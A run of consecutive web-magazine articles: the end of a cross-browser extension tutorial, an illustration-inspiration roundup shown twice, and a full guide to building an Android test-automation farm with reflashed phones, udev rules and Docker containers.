            if (!this._useBingTTS || BINGSPEECHKEY === "") {
                var synUtterance = new SpeechSynthesisUtterance();
                synUtterance.text = resultToSpeak;
                window.speechSynthesis.speak(synUtterance);
            }
            else {
                this._bingTTSclient.synthesize(resultToSpeak);
            }
        }
    };
    xhr.onerror = (evt) => {
        console.log(evt);
    };
    try {
        xhr.open('POST', 'https://api.projectoxford.ai/vision/v1.0/describe');
        xhr.setRequestHeader("Content-Type", "application/json");
        xhr.setRequestHeader("Ocp-Apim-Subscription-Key", COMPUTERVISIONKEY);
        var requestObject = { "url": url };
        xhr.send(JSON.stringify(requestObject));
    } catch (ex) {
        console.log(ex);
    }
}
The following articles will help you understand how this Computer Vision API works:
In our case, we’re using the describe feature of the API. You’ll also notice in the callback that we will try to use either the Web Speech API or the Bing Text-to-Speech service, based on your options.
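The choice between the two speech back ends boils down to a single condition. Here is a hedged sketch of that decision as my own helper function; the option and key names mirror those used in the article’s code:

```javascript
// Sketch of the fallback described above: prefer the Bing Text-to-Speech
// service only when the option is enabled AND a key is configured;
// otherwise fall back to the browser's Web Speech API.
function chooseSpeechEngine(useBingTTS, bingSpeechKey) {
  return (!useBingTTS || bingSpeechKey === "") ? "web-speech-api" : "bing-tts";
}

console.log(chooseSpeechEngine(false, "somekey")); // "web-speech-api"
console.log(chooseSpeechEngine(true, ""));         // "web-speech-api" (no key configured)
console.log(chooseSpeechEngine(true, "somekey"));  // "bing-tts"
```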
Here, then, is the global workflow of this little extension:
Let’s quickly review how to install the extension in each browser.
Download or clone my small extension54 from GitHub somewhere to your hard drive.
Also, modify dareangel.dashboard.js to add at least a Computer Vision API key. Otherwise, the extension will only be able to display the images extracted from the web page.
First, you’ll need at least a Windows 10 Anniversary Update (OS Build 14393+) to have support for extensions in Edge.
Then, open Edge and type about:flags in the address bar. Check the “Enable extension developer features” box.
Click on “…” in Edge’s navigation bar, then “Extensions,” then “Load extension,” and select the folder where you’ve cloned my GitHub repository. You’ll get this:
Click on this freshly loaded extension, and enable “Show button next to the address bar.”
Note the “Reload extension” button, which is useful while you’re developing your extension. You won’t be forced to remove or reinstall it during the development process; just click the button to refresh the extension.
Navigate to BabylonJS, and click on the Dare Angel (DA) button to follow the same demo as shown in the video.
In Chrome, navigate to chrome://extensions. In Opera, navigate to opera://extensions. And in Vivaldi, navigate to vivaldi://extensions. Then, enable “Developer mode.”
Click on “Load unpacked extension,” and choose the folder where you’ve extracted my extension.
Navigate to BabylonJS, and open the extension to check that it works fine.
You’ve got two options here. The first is to temporarily load your extension, which is as easy as it is in Edge and Chrome.
Open Firefox, navigate to about:debugging and click “Load Temporary Add-on.” Then, navigate to the folder of the extension, and select the manifest.json file. That’s it! Now go to BabylonJS to test the extension.
The only problem with this solution is that every time you close the browser, you’ll have to reload the extension. The second option would be to use the XPI packaging. You can learn more about this in “Extension Packaging65” on the Mozilla Developer Network.
The public version of Brave doesn’t have a “developer mode” embedded in it to let you load an unsigned extension. You’ll need to build your own version of it by following the steps in “Loading Chrome Extensions in Brave66.”
As explained in that article, once you’ve cloned Brave, you’ll need to open the extensions.js file in a text editor. Locate the lines below, and insert the registration code for your extension. In my case, I’ve just added the two last lines:
// Manually install the braveExtension and torrentExtension
extensionInfo.setState(config.braveExtensionId, extensionStates.REGISTERED)
loadExtension(config.braveExtensionId, getExtensionsPath('brave'), generateBraveManifest(), 'component')
extensionInfo.setState('DareAngel', extensionStates.REGISTERED)
loadExtension('DareAngel', getExtensionsPath('DareAngel/'))
Copy the extension to the app/extensions folder. Open two command prompts in the browser-laptop folder. In the first one, launch npm run watch, and wait for webpack to finish building Brave’s Electron app. It should say, “webpack: bundle is now VALID.” Otherwise, you’ll run into some issues.
Then, in the second command prompt, launch npm start, which will launch our slightly custom version of Brave.
In Brave, navigate to about:extensions, and you should see the extension displayed and loaded in the address bar.
Tip for all browsers: use console.log() to log some data from the flow of your extension. Most of the time, using the browser’s developer tools, you’ll be able to click on the JavaScript file that logged it to open it and debug it.
To debug the client script part, living in the context of the page, you just need to open F12. Then, click on the “Debugger” tab and find your extension’s folder.
Open the script file that you’d like to debug — dareangel.client.js, in my case — and debug your code as usual, setting up breakpoints, etc.
If your extension creates a separate tab to do its job (like the Page Analyzer73, which our Vorlon.js74 team published in the store), simply press F12 on that tab to debug it.
If you’d like to debug the popup page, you’ll first need to get the ID of your extension. To do that, simply go into the properties of the extension, and you’ll find an ID property:
Then, you’ll need to type in the address bar something like ms-browser-extension://ID_of_your_extension/yourpage.html. In our case, it would be ms-browser-extension://DareAngel_vdbyzyarbfgh8/dashboard.html. Then, simply use F12 on this page:
Because Chrome and Opera rely on the same Blink code base, they share the same debugging process. Even though Brave and Vivaldi are forks of Chromium, they also share the same debugging process most of the time.
To debug the client script part, open the browser’s developer tools on the page that you’d like to debug (pressing F12, Control + Shift + I or ⌘ + ⌥ + I, depending on the browser or platform you’re using).
Then, click on the “Content scripts” tab and find your extension’s folder. Open the script file that you’d like to debug, and debug your code just as you would do with any JavaScript code.
To debug a tab that your extension would create, it’s exactly the same as with Edge: Simply use the developer tools.
For Chrome and Opera, to debug the popup page, right-click on the button of your extension next to the address bar and choose “Inspect popup,” or open the HTML pane of the popup and right-click inside it to “Inspect.” Vivaldi only supports right-click and then “Inspect” inside the HTML pane once opened.
For Brave, it’s the same process as with Edge. You first need to find the GUID associated with your extension in about:extensions:
And then, in a separate tab, open the page you’d like to debug — in my case, chrome-extension://bodaahkboijjjodkbmmddgjldpifcjap/dashboard.html — and open the developer tools.
For the layout, you have a bit of help using Shift + F8, which will let you inspect the complete frame of Brave. And you’ll discover that Brave is an Electron app using React!
Note, for instance, the data-reactroot attribute.
Note: I had to slightly modify the CSS of the extension for Brave because it currently displays popups with a transparent background by default, and I also had some issues with the height of my images collection. I’ve limited it to four elements in Brave.
Mozilla has really great documentation on debugging web extensions91.
For the client script part, it’s the same as in Edge, Chrome, Opera and Brave. Simply open the developer tools in the tab you’d like to debug, and you’ll find a moz-extension://guid section with your code to debug:
If you need to debug a tab that your extension would create (like Vorlon.js’ Page Analyzer extension), simply use the developer tools:
Finally, debugging a popup is a bit more complex but is well explained in the “Debugging Popups96” section of the documentation.
Each vendor has detailed documentation on the process to follow to publish your extension in its store. They all take similar approaches. You need to package the extension in a particular file format — most of the time, a ZIP-like container. Then, you have to submit it in a dedicated portal, choose a pricing model and wait for the review process to complete. If accepted, your extension will be downloadable in the browser itself by any user who visits the extensions store.
Here are the various processes:
Please note that submitting a Microsoft Edge extension to the Windows Store is currently a restricted capability. Reach out to the Microsoft Edge team103 with your request to be a part of the Windows Store, and they’ll consider you for a future update.
I’ve tried to share as much as possible of what I’ve learned from working on our Vorlon.js Page Analyzer extension104 and on this little proof of concept.
Some developers remember the pain of working through various implementations to build their extension — whether it meant using different build directories, or working with slightly different extension APIs, or following totally different approaches, such as Firefox’s XUL extensions or Internet Explorer’s BHOs and ActiveX.
It’s awesome to see that, today, using our regular JavaScript, CSS and HTML skills, we can build great extensions using the very same code base and across all browsers!
Feel free to ping me on Twitter105 for any feedback.
(ms, vf, rb, yk, al, il)
On days when things don’t seem to go as you’d like them to and inspiration is at its lowest, it’s good to take a short break and go outside to try and empty your mind. That always seems to be the best remedy for me, especially whenever I jump on my bike and go for a short ride.
Now the time has come to enjoy these moments even more as the spring season finally starts to show up in nature. We’re starting to see green leaves on the trees again, and every morning I wake up to the sounds of the birds chirping. I really enjoy these small joys of spring — who doesn’t? Hopefully this new batch of illustrations will feed your creativity tank with extra vitamins to make sure those inspiration levels are up and running at their best.
Great color combination. Impressive how all elements have been refined to their best simplicity.
The fantasy of French illustrator Quentin Monge. Such a lovely style!
Admiring how the illustrator played with light sources and shadows. The faces immediately catch your attention, don’t they?
This one made me laugh. What if I was small? Those characters are just sublime! So very well done.
Riding your bike together is exactly like you see here.
Part of a bigger illustration of a mural. You can view a process video of how this was applied on the wall here15.
Part of a bumper animation that plays before each film at Cinerama. Here you see it animated18. It’s really cool — I’m sure you’ll agree.
Sometimes you don’t need much to get a great picture.
This vintage bicycle event always has a nice poster.
Nice style! The eyes with glasses are such stunners.
A sneak peek of a new print the crew at DKNG is working on. Looks like Austin to me. Love the effect of the letters used as masks. How the few colors are applied is just sublime!
One of ten finalist entries that capture the theme of “through young eyes” in this young photographers’ competition that aims to engage youth around the world in wildlife conservation. Check out the other nine submissions29, too.
Divine color palette! Superb highlights and shadows.
My kind of color palette and great textures.
The colors are so harmonious and pleasing, and the drawing is just magnificent.
Another addition to the European Tour Tycho is currently working on. This is quite lovely and makes me think back to the cassette era.
Always a fan of something with a bike in it. When it’s created by the talented Madsberg, it gets even better. I love the elegance in his work.
Part of a series that was created as an irreverent ad campaign inspired by the hotel’s close relationship with the contemporary art world.
Project on the theme of music, while playing with a Bauhaus-inspired style.
Interesting play with lines. Not an easy one to pull off.
With the atmosphere in this illustration, you just feel the night. Come in and enjoy the ride.
Brilliant light. Excellently executed. A perfect example of what you can get when you are in the right spot at the right time.
Marvellous winter picture! Ain’t that light spectacular?
Special style. Inspiring patterns.
Lovely custom type and ornaments.
Beautiful perspective, great reflection and amazing warm colors!
Gorgeous photos of Paris from Nathalie Geffroy. Be sure to go see the rest.
I’ve been following Oksana Grivina for many years, and her style is just as lovely as I remember.
The legendary car that can still be seen in Oudenaarde, Belgium. Neil Stevens created this one for Matchbox.
The portraits of Elodie are always a pleasure to look at. So many details to take in (I wish I could do that).
A second one from Elodie that I couldn’t resist. Look at those eyes and lips.
Admiring the faces of these holiday characters for Westjet’s inflight magazine “UP”. The expressions are created with just a few lines.
Love the use of color and patterns. Beautiful curvy lines of the landscape, too!
What an amazing display of white Northern Lights, or a white aurora curtain, seen somewhere over Finland.
Beautiful cover for Fabric’s spring issue. Sam’s work usually has a futuristic element to it, but this one is great too, especially the plants and colors. Those lines and details in each leaf are just fantastically well executed. Perfect light and shadow effects, too.
The typefaces, textures and colors are all spot on in this illustration. Inspired by country vintage.
Beautiful harmony and consistency without leaning towards kitsch. Not easy when there is gold involved.
Nice identity for The Digital Arts Expo, an annual showcase of student and faculty projects integrating engineering, computer science, and the visual and performing arts.
Great nostalgic vibe in this one. Reminds me of the early adverts from the ’60s. Love the bright colors, as well as the shadow and highlight effects.
Illustration created for The Pixar Times86. Everybody loves a hero. Love how the shadows are done, and the pattern effects.
Illustrations for Eurostar’s Metropolitan magazine to accompany an article about what to see and do in Brussels. The butcher chasing the cow is such a nice detail.
The faces are very original and recognizable as the style of Dutch illustrator Jackie Besteman.
91Love the figures and how they are portrayed.
93“When I’m stressed about work, I just think about this. Drawring!” Beautiful custom typography and great colors.
95A nice pattern of hotdogs to get you hungry. It’s available at the pattern library97.
98This image goes along an article on how Tim Tebow is making a drastic switch from being a football player to a baseball player. Love this vertical stripe collage blend effect. So well done!
100The lanes in the grass are like guides to draw you into the building. It also creates a beautiful symmetrical vibe.
102With a view like this I would totally think so. Taken in Belvedere, Tuscany.
104Great usage of minimal colors and shapes.
106Lovely tribute to the bokeh effect.
108(il)
On days when things don’t seem to go as you’d like them to and inspiration is at its lowest, it’s good to take a short break and go outside to try and empty your mind. That always seems to be the best remedy for me, especially whenever I jump on my bike and go for a short ride.
Now the time has come to enjoy these moments even more as the spring season finally starts to show up in nature. We’re starting to see green leaves on the trees again, and every morning I wake up to the sounds of the birds chirping. I really enjoy these small joys of spring — who doesn’t? Hopefully this new batch of illustrations will feed your creativity tank with extra vitamins to make sure those inspiration levels are up and running at their best.
Great color combination. Impressive how all elements have been refined to their best simplicity.
The fantasy of French illustrator Quentin Monge. Such a lovely style!
Admiring how the illustrator played with light sources and shadows. The faces immediately catch your attention, don’t they?
This one made me laugh. What if I was small? Those characters are just sublime! So very well done.
Riding your bike together is exactly like you see here.
Part of a bigger illustration of a mural. You can view a process video of how this was applied on the wall here.
Part of a bumper animation that plays before each film at Cinerama. Here you see it animated. It’s really cool — I’m sure you’ll agree.
Sometimes you don’t need much to get a great picture.
This vintage bicycle event always has a nice poster.
Nice style! The eyes with glasses are such stunners.
A sneak peek of a new print the crew at DKNG is working on. Looks like Austin to me. Love the effect of the letters used as masks. How the few colors are applied is just sublime!
One entry of ten finalists that capture the theme of “through young eyes” in this young photographers’ competition that aims to engage youth around the world in wildlife conservation. Check out the other nine submissions, too.
Divine color palette! Superb highlights and shadows.
My kind of color palette and great textures.
The colors are so harmonious and pleasing, and the drawing is just magnificent.
Another addition to the European Tour Tycho is currently working on. This is quite lovely and makes me think back to the cassette era.
Always a fan of anything with a bike in it. When it’s created by the talented Madsberg, it gets even better. I love the elegance in his work.
Part of a series that was created as an irreverent ad campaign inspired by the hotel’s close relationship with the contemporary art world.
A project on the theme of music, playing with a Bauhaus-inspired style.
Interesting play with lines. Not an easy one to pull off.
With the atmosphere in this illustration, you can just feel the night. Come in and enjoy the ride.
Brilliant light. Excellently executed. A perfect example of what you can get when you are in the right spot at the right time.
Marvellous winter picture! Ain’t that light spectacular?
Special style. Inspiring patterns.
Lovely custom type and ornaments.
Beautiful perspective, great reflection and amazing warm colors!
Gorgeous photos of Paris from Nathalie Geffroy. Be sure to go see the rest.
I’ve been following Oksana Grivina for many years, and her style is just as lovely as I remember.
The legendary car that can still be seen in Oudenaarde, Belgium. Neil Stevens created this one for Matchbox.
The portraits of Elodie are always a pleasure to look at. So many details to take in and think about (wish I could do that).
A second one from Elodie that I couldn’t resist. Look at those eyes and lips.
Admiring the faces of these holiday characters for Westjet’s inflight magazine “UP”. The expressions are created with just a few lines.
Love the use of color and patterns. Beautiful curvy lines of the landscape too!
What an amazing display of white Northern Lights, or a white aurora curtain. Seen somewhere over Finland.
Beautiful cover for Fabric’s spring issue. Sam’s work usually has a futuristic element to it, but this one is great too, especially the plants and colors. Those lines and details in each leaf are just fantastically well executed. Perfect light and shadow effects too.
The typefaces, textures and colors are all spot on in this illustration. Inspired by country vintage.
Beautiful harmony and consistency without leaning towards kitsch. Not easy when there is gold involved.
Nice identity for The Digital Arts Expo, an annual showcase of student and faculty projects integrating engineering, computer science, and the visual and performing arts.
Great nostalgic vibe in this one. Reminds me of early adverts from the ’60s. Love the bright colors, as well as the shadow and highlight effects.
Illustration created for The Pixar Times. Everybody loves a hero. Love how the shadows are done, and the pattern effects.
Illustrations for Eurostar’s Metropolitan magazine to accompany an article about what to see and do in Brussels. The butcher chasing the cow is such a nice detail.
The faces are very original and recognizable as the style of Dutch illustrator Jackie Besteman.
Love the figures and how they are portrayed.
“When I’m stressed about work, I just think about this. Drawring!” Beautiful custom typography and great colors.
A nice pattern of hotdogs to make you hungry. It’s available at the pattern library.
This image accompanies an article on how Tim Tebow is making a drastic switch from football player to baseball player. Love this vertical stripe collage blend effect. So well done!
The lanes in the grass are like guides to draw you into the building. It also creates a beautiful symmetrical vibe.
With a view like this, I would totally think so. Taken in Belvedere, Tuscany.
Great use of minimal colors and shapes.
Lovely tribute to the bokeh effect.
(il)
Regression testing is one of the most time-consuming tasks when developing a mobile Android app. Using myMail as a case study, I’d like to share my experience and advice on how to build a flexible and extensible automated testing system for Android smartphones — from scratch.
The team at myMail currently uses about 60 devices for regression testing. On average, we test roughly 20 builds daily. Approximately 600 UI tests and more than 3,500 unit tests are run on each build. The automated tests are available 24/7 and save our testers a ton of time, helping us to create high-quality applications. Without them, it would take us 36 hours (including wait time) to run a full regression by hand, or roughly 13 hours without the wait. An automated run takes about 1.5 hours, including setup and translation updates. Over time, this adds up to weeks of saved tester work.
Even if you write automated tests but don’t normally deal with infrastructure, this article will walk you through the process from the very beginning: from purchasing the phones and reinstalling firmware to creating Docker containers, each with an automated-test phone inside. Watch the video to see the result.
When Android was just beginning to gain popularity, test developers had to choose the lesser of two evils: buy an expensive set of phones or work with slow and buggy virtual devices. Today, things are much simpler, because tools such as Android x86 images and Intel’s HAXM hardware acceleration are available.
Yet there is still a choice to make. Many developers prefer virtual machines for automated tests, but actual phones have become a rather affordable option, even if your budget for test automation is limited. Real phones provide the most accurate picture of the application’s actual behavior. By using real phones, you can be certain that users will be able to perform any action in the program.
Accordingly, I recommend that even people who currently use virtual machines for test automation on Android obtain some real devices to ensure that their tests are also correct in real life. I’ll tell you how to choose a phone for automated regression testing and tell you what other equipment you’ll need in order to get everything to work together 24/7.
First of all, I should warn you that we will be choosing a phone model for regression tests, not configuration tests. Let’s assume that we have a lot of tests, for example 500 to 1000 application tests, that take 10 hours, and that we need several phones to complete them in 15 minutes. This sounds a little counterintuitive — why not just buy 10 to 20 different models of phones? The answer lies in the labor costs for the test automation code. You would end up writing the same test for different phone interfaces. When working with 20 different models, writing even one simple test would take a lot of time. But our present goal is to accelerate the execution of automated tests without increasing the labor costs of the programmer writing the tests.
The phone market is large, so it’s hard to know where to look first. What should be the criteria when choosing a phone? After some trial and error, I ended up with the following requirements (I’m not including any unit prices, since they should be readily available):
These criteria for purchasing a phone boil down to two things: The phone should not be slow or stuttering, and its software innards should be as customizable as possible. Eliminating lag saves us from the troubles of time-consuming tests, and customizability lets us correct problems that may arise over time (deterioration of operating system versions, internal phone bugs, a need to change system settings). If you find that something works incorrectly on the phone, you at least have a chance to fix it yourself.
Root privileges, for example, let you use the command line to easily change the time on the phone, switch between Wi-Fi networks, and enable and disable system programs to simulate working with and without them. The unlocked boot sector lets you update the operating system and add custom firmware that extends the phone’s life even if the manufacturer discontinues support (which, unfortunately, is the case with most phones we have now). It would be unfortunate if users on Android 4.4 or Android 6 encountered an error while all of your automated-test phones run Android 5 and nothing can be changed.
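As a minimal sketch of those root-only tweaks, here are the corresponding adb one-liners. The package name com.example.vendorapp is a placeholder, the date format is the one toybox expects (it varies by Android version), and ADB defaults to a dry-run echo so the commands can be read without a device attached; set ADB=adb to run them for real.

```shell
# Dry-run wrapper: prints the commands unless ADB is overridden.
ADB="${ADB:-echo adb}"

# Change the phone's clock (toybox format MMDDhhmmYYYY.ss; needs root)
$ADB shell su -c "date 010112002017.00"

# Toggle Wi-Fi off and on (needs root on most builds)
$ADB shell su -c "svc wifi disable"
$ADB shell su -c "svc wifi enable"

# Disable/enable a system app to simulate its absence
# (com.example.vendorapp is a placeholder package name)
$ADB shell su -c "pm disable com.example.vendorapp"
$ADB shell su -c "pm enable com.example.vendorapp"
```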
Unfortunately, you can’t ask the seller about most of these criteria at the time of purchase. That’s why we must first go to the XDA Developers forums and 4PDA forums to find all of the details we need to know about the model. If the model has been out for a while, pay attention to information about defects, memory and battery life — your device will be all but useless without these. Don’t be distracted by screens, buttons, cases, speakers and other features usually important to a user. The phone will work perfectly fine regardless (although this does depend on the specifics of your project).
Once you’ve chosen a model, you should probably order one or two for pretests to be sure that the OS doesn’t have any surprises in store, that all of the written tests run properly and that the hardware matches the manufacturer’s specifications. Below are the worst blunders I’ve seen in my experience as a buyer:
getprop and get-IDs. The issue is that the phone has passed through multiple hands and regions before getting to you. Its first owner was some Verizon subscriber from South Dakota. He returns it, and the now refurbished device somehow ends up with some seller in Tel Aviv, who unskillfully installs his local OS version on the hardware. Then, a seller from Moscow buys it and sells it again as a new phone. The courier brings it to you, and you receive your new eight-core reflashable Russian device, having no clue that you are actually holding a six-core locked area-specific device originally from a US cellular service customer.
However, if you stick to the criteria above when choosing your phone, then these problems shouldn’t prove fatal. They can all be manually fixed to make the phone work properly.
So, which phones should you get to create your own test automation farm?
If you have the resources to buy the latest working models of Google Nexus (currently, devices such as the Nexus 5X and 6P), then get these without thinking twice. You can install almost any operating system on them, they have an inherently “clean” Android base, and developers also tend to use them to test their applications.
Many companies are currently producing phone models for developers. With these phones, you can generally unlock the bootloader, and root privileges are available. If you find a good offer, take it.
Many phones with MediaTek (MTK) processors can be reflashed perfectly, and their main advantage is low cost. You’ll need to look for the specific models on the local market in your country, because the phones are typically available under different brand names, depending on location. The real manufacturers are usually large companies such as Gionee, Lenovo, Inventec, Tinno Mobile, Longcheer and Techain. These companies resell their phones in Western countries under brand names including Fly, Zopo, Wiko, Micromax, MyPhone, Blu, Walton, Allview and others. But not all phones are suitable: always evaluate them according to the criteria listed above. Farms with phones like these can often be cheaper than servers with virtual Android machines, so there is a significant chance to save some money here.
In addition to phones, you are going to need a computer and USB hubs to run the automated tests. There are some other things to consider at this stage. For example, constantly operating phones need a good power supply (at least 0.5A per device; more is better). The majority of hubs on the market come with weak adapters, not designed to have a constantly running phone plugged in at every port. Things are even more complicated when it comes to tablets: 9-inch tablets die quickly when running continuously because of their large screens’ power consumption, so we have to choose among 7-inch units. In our experience, six to seven phones can be hooked up to a 4A adapter (depending on their workload). Therefore, most multiport hubs with a “3A adapter and 20 USB ports” are useless, to put it mildly. The cream of the crop is server solutions, but they are crazy expensive. So, we are going to have to limit ourselves to the consumer market. To keep the phones running, you have to get 3A four-port hubs or 4A six-port hubs. If a hub has a good power supply and a large number of ports, some ports can simply remain unused.
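The power-budget arithmetic above can be sketched as a quick shell calculation. The 500 mA-per-phone figure and the 20% safety margin are the rough assumptions from the paragraph, not exact measurements; adjust them for your devices’ real draw.

```shell
# Rough USB-hub power budget: how many constantly running phones can a
# given adapter feed? Assumes ~500 mA per phone plus ~20% headroom.
adapter_ma=4000    # a "4A adapter"
per_phone_ma=500
headroom_pct=120   # 20% safety margin, as integer math

max_phones=$(( adapter_ma * 100 / (per_phone_ma * headroom_pct) ))
echo "A ${adapter_ma} mA adapter can feed about ${max_phones} phones"
```

With a 4000 mA adapter this lands on about 6 phones, which matches the six-to-seven figure from our experience.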
Let’s look at one phone model as an example. We will solve an OS problem and then try to put several devices together on a simple test stand for test automation. The phone itself is inexpensive and of decent quality, but it is not without its own shortcomings (described above). For example, these phones have the same iSerial, so ADB sees only one device, even if multiple devices are connected. We won’t change it everywhere on the phone, but we’ll make it possible for ADB to distinguish between the phones.
To do this, we have to reflash the phone’s bootloader and install a custom recovery partition on the phone. This protects us from any unsuccessful experiments. Manuals on how to flash your specific phone model can be found on the XDA Developers forums. Our phones have an MT6580 installed, which is an MTK processor, so we can use SP Flash Tool, along with recovery.img and scatter files for our devices. These can be found online for almost any device on XDA Developers and 4PDA but, if desired, a recovery can be compiled for your device using TWRP as a base and creating the scatter file yourself. In any event, we’ll just take our files and reinstall them:
Once the recovery partition is installed, use it to save a bootloader backup and move it to your machine. As a rule, this is where the OS configuration files are located.
In order to hardcode your iSerial, you’ll need to unpack the phone’s bootloader image. This can be done via Android Image Kitchen. Start unpackimg.sh and get the unpacked image in the ramdisk folder:
The ramdisk folder contains init files with different variables, including the serial number.
Let’s find the files containing the serial-number variable ${ro.serialno} and replace it with our own number — for example, 999222333019:
find ramdisk/ -maxdepth 1 -name "init.mt*" -exec sed -i
's/${ro.serialno}/999222333019/g' {} +
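Before repacking the real image, you can sanity-check the same find/sed substitution on a throwaway copy, so a mistake doesn’t cost you a reflash. The file name init.mt6580.rc below is just an example stand-in for the real init files.

```shell
# Scratch directory with a fake init file containing the variable
mkdir -p /tmp/ramdisk-test
printf 'ro.serialno=${ro.serialno}\n' > /tmp/ramdisk-test/init.mt6580.rc

# Same substitution as on the real ramdisk
find /tmp/ramdisk-test/ -maxdepth 1 -name "init.mt*" \
  -exec sed -i 's/${ro.serialno}/999222333019/g' {} +

cat /tmp/ramdisk-test/init.mt6580.rc   # -> ro.serialno=999222333019
```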
Now, let’s pack the image back up using repackimg.sh, transfer it to the phone and install it using the custom recovery. Now ADB can distinguish between the devices. All we need to do is enable developer mode on the phone and turn on USB debugging in the developer menu. Any similar problem can be solved in exactly the same way: pretty much everything on the phone can be reflashed if that is what the tests require.
We will use a standard desktop running Ubuntu as the host for our test system. It might be necessary to transfer the connected phones from one computer to another, and we might also need to build separate versions of the app for specific phone models.
To accomplish this, it’s a good idea to create an isolated virtual environment for each phone, which we can change if necessary (for example, to install other versions of the Java Development Kit or to configure monitoring) without altering the other phones’ environments. As a result, our machine will be divided into several environments, each one accessible via a single phone (or a group of phones, depending on your requirements). We can establish these environments by creating several virtual machines on the host (this can be done on any operating system), or you can do what I like to do and divide the phones using Docker containers, which work best on Linux.
There are specifics to consider when ordering or building the machines that the phones will be connected to. Apart from the standard HDD, RAM and CPU specs, pay attention to the number of USB controllers on the motherboard and the supported USB protocol. Phones that use USB 3.0 (xHCI) could significantly limit the maximum number of devices attached to the machine (usually 8 per controller, or 16 devices for a machine with 2 controllers), so it’s worth checking whether it’s possible to turn it off and use only EHCI. You will find those options in the BIOS or OS. It is best to forcibly disable xHCI in the BIOS if you don’t require high-speed devices.
As I wrote earlier, we want an integration system slave-agent to work with a specific phone and see only this phone. This way, the tests won’t accidentally run on other phones and give false pass or error results. To accomplish this, we need to separate them. When an integration system agent launches in a Docker container, each agent has access to only one device, so we can divide tasks in the integration system by specific phone models, operating system versions, screen sizes and other characteristics (for example, a container with a tablet can perform tests that require a wide screen, and a container with a phone could run tests requiring the ability to receive text messages).
Let’s use the example of a system installation and setup on Ubuntu. Here is the installation of Docker itself:
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
echo 'deb https://apt.dockerproject.org/repo ubuntu-trusty main' >> /etc/apt/sources.list.d/docker.list
sudo apt-get update
sudo apt-get install docker-engine
We are going to use OverlayFS as a storage driver (it is relatively fast and reliable). You can read about the differences between various storage drivers23 on the official Docker website.
echo 'DOCKER_OPTS="-s overlay"' >> /etc/default/docker
Then, we will create a Dockerfile — the instructions from which Docker builds images — installing the minimum software required for the virtual environment in which a mobile device will be isolated. Let’s add the Android SDK to the Dockerfile:
FROM ubuntu:trusty

# Update the list of repositories and add the webupd8team repository,
# from which we'll install Java
RUN apt-get update -y && apt-get install -y software-properties-common && \
    add-apt-repository ppa:webupd8team/java -y && apt-get update -y && \
    echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | /usr/bin/debconf-set-selections && \
    apt-get install -y oracle-java8-installer && \
    apt-get remove software-properties-common -y && apt-get autoremove -y && apt-get clean

# Set the environment variables for Java and the desired version of Ant
ENV JAVA_HOME /usr/lib/jvm/java-8-oracle
ENV ANT_VERSION 1.9.4

# Install the Ant version specified above
RUN cd && wget -q http://archive.apache.org/dist/ant/binaries/apache-ant-${ANT_VERSION}-bin.tar.gz && \
    tar -xzf apache-ant-${ANT_VERSION}-bin.tar.gz && \
    mv apache-ant-${ANT_VERSION} /opt/ant && \
    rm apache-ant-${ANT_VERSION}-bin.tar.gz

# Set the environment variables for Ant
ENV ANT_HOME /opt/ant
ENV PATH ${PATH}:/opt/ant/bin

# Install Android Build Tools and the required version of the Android SDK.
# You can create several versions of the Dockerfile if you need to test
# several versions
ENV ANDROID_SDK_VERSION r24.4.1
ENV ANDROID_BUILD_TOOLS_VERSION 23.0.3
RUN dpkg --add-architecture i386 && apt-get update -y && \
    apt-get install -y libc6:i386 libncurses5:i386 libstdc++6:i386 lib32z1 && \
    rm -rf /var/lib/apt/lists/* && apt-get autoremove -y && apt-get clean
ENV ANDROID_SDK_FILENAME android-sdk_${ANDROID_SDK_VERSION}-linux.tgz
ENV ANDROID_SDK_URL http://dl.google.com/android/${ANDROID_SDK_FILENAME}
ENV ANDROID_API_LEVELS android-15,android-16,android-17,android-18,android-19,android-20,android-21,android-22,android-23
ENV ANDROID_HOME /opt/android-sdk-linux
ENV PATH ${PATH}:${ANDROID_HOME}/tools:${ANDROID_HOME}/platform-tools
RUN cd /opt && wget -q ${ANDROID_SDK_URL} && \
    tar -xzf ${ANDROID_SDK_FILENAME} && rm ${ANDROID_SDK_FILENAME} && \
    echo y | android update sdk --no-ui -a --filter tools,platform-tools,${ANDROID_API_LEVELS},build-tools-${ANDROID_BUILD_TOOLS_VERSION}

# Now add the integration system agent. It can be a Jenkins slave,
# a Bamboo agent, etc., depending on what you're working with.
ADD moyagent.sh /agentCI/
You can also add all of the necessary libraries and files for the integration system agent to the Dockerfile. At some point, you might have to build containers not only for your physical devices, but also for virtual Android phone emulators. In this case, you can just add the required settings to the instructions. Now we’ll build the Dockerfile:
docker build -t android-docker-image:latest .
Now we have a runnable Docker image; however, a container spawned from it would not see any devices (or, on the contrary, the container would see all USB devices if we ran it in privileged mode). We need it to see only those devices we want it to see. So, we create a symbolic link (symlink) on the host, which we will then pass to the Docker container created from the image. We create the symlink using udev:
echo 'SUBSYSTEM=="usb", ATTRS{serial}=="$DEVICE_SERIAL", SYMLINK+="androidDevice1"' >> /etc/udev/rules.d/90-usb-symlink-phones.rules
Instead of $DEVICE_SERIAL, we enter our freshly installed serial number and reload the device’s rule definitions:
udevadm control --reload
udevadm trigger
Now when the phone is attached via USB, we will have a device symlink to the /dev/androidDevice1 path with the serial number $DEVICE_SERIAL. All we have left to do is transfer it to the container on startup:
docker run -i -t --rm --device=/dev/androidDevice1:/dev/bus/usb/001/1 android-docker-image:latest adb devices
This means that we want to create a container from the Android Docker image that must be able to access the device with the /dev/androidDevice1 symlink. We also want to launch the ADB devices command in the container itself, which will show us a list of available devices.
If the phone is visible, then we’re ready. If an integration system agent was installed in the image, we can use the following command to launch it:
docker run -i -t --rm --device=/dev/androidDevice1:/dev/bus/usb/001/1 android-docker-image:latest /bin/sh /agentCI/moyagent.sh
Now we have launched the container in which the system integration agent is running. The agent now has access to the device via the /dev/androidDevice1 symlink and to the virtual environment where all programs specified in Dockerfile (the Android SDK and additional dependencies) are installed.
By the way, it wasn’t until fairly recently that the command line option --device started working with symlinks (see the GitHub master branch). Previously, we had to generate the realpath from symlinks using a script and transfer it to Docker. So, if you can’t manage to connect the device, add the following script to the udev parameter RUN+= (if the connected phone is located at /dev/bus/usb/010/1):
realpath /dev/androidDevice1 | xargs -I linkpath link linkpath /dev/bus/usb/010/1
This will let you use old versions of Docker to launch a container that can access the phone:
docker run --privileged -v /dev/bus/usb/010/:/dev/bus/usb/100/ -i -t android-docker-image:latest adb devices
That’s it. You can now connect your slave to the integration system and work with it.
